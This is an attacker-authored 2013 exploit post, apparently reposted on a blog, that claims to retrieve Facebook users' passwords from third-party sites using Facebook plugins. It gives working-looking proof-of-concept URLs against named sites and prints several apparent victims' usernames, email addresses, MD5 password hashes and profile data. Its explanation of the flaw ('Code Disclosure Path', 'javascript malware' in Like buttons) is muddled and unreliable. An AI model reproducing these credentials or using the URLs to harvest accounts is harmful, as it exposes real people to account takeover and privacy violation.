#############################################################
# Title: Exploit Facebook Via External Plugins and Modules
# Exploitation: Manually (use your brain ^_^)
# Date: 28/03/2013
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################


For Example my victim is =======>>> https://www.facebook.com/gaturro22
How i could be able to retrieve his password ? easy
Proof of Concept : Facebook Id ====>>> gaturro22
P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22
So as you can see we got the email & the password :
email: gonza.la22@gmail.com

password: e10adc3949ba59abbe56e057f20f883e

Another Demo : http://www.salondaddy.com/profile.php?ID=85


So when i try the same method with my profile for example : http://www.poringapic.com/profile.php?id=mauritanie.forever

It says "Invalid profile link followed!" loool because i didn't clicked on the Like Button so an advice becareful don't like external pages on websites they are

backdoored with a javascript malware that can sniff all your informations ^_^

So for example the ID "profile.php" is infected with "Code Disclosure Path" as you can see most of websites nowadays they use plugins of facebook on their websites

especially applications , so the facebook user must allow permission to access to the application and most of the plugins are infected !_!

So if you see that a website has the Like Plugin or use a facebook app you can surely get the passwords of the users ^_^ no doubt , just use your brain !

Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top

Check this : [NickName] => orso44 ===========>>> add this to www.facebook.com

http://www.facebook.com/orso44 ============>>> Facebook Profile

[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5


Another Victim : ==========>>> https://www.facebook.com/kornberg

Infos Retrieved :

[_iProfileID] => 7893
[_aProfile] => Array
(
[datafile] => 1
[ID] => 7893
[NickName] => Kornberg
[Email] => anselmpennell435@yahoo.com
[Password] => 087fbfdeb33dae28260cfdb8f2d8a787
[Status] => Active
{
"id": "862420463",
"name": "Zoe Kornberg",
"first_name": "Zoe",
"last_name": "Kornberg",
"username": "kornberg",
"gender": "female",
"locale": "en_US"
}
Proof Of Concept : http://hollywoodfilmshoot.com/profile.php?ID=7893&sh_photoMode=rand 

I just selected this user randomly from Facebook and i remarked that she clicked on Like Button and she has been a victim °_° !!!!!!!

Post a Comment

+ Hiện tại HungCoder.Com đang cập nhật giao diện cho trang blog này. Nên sẽ có một số lỗi xãy ra khi các bạn xem blog này.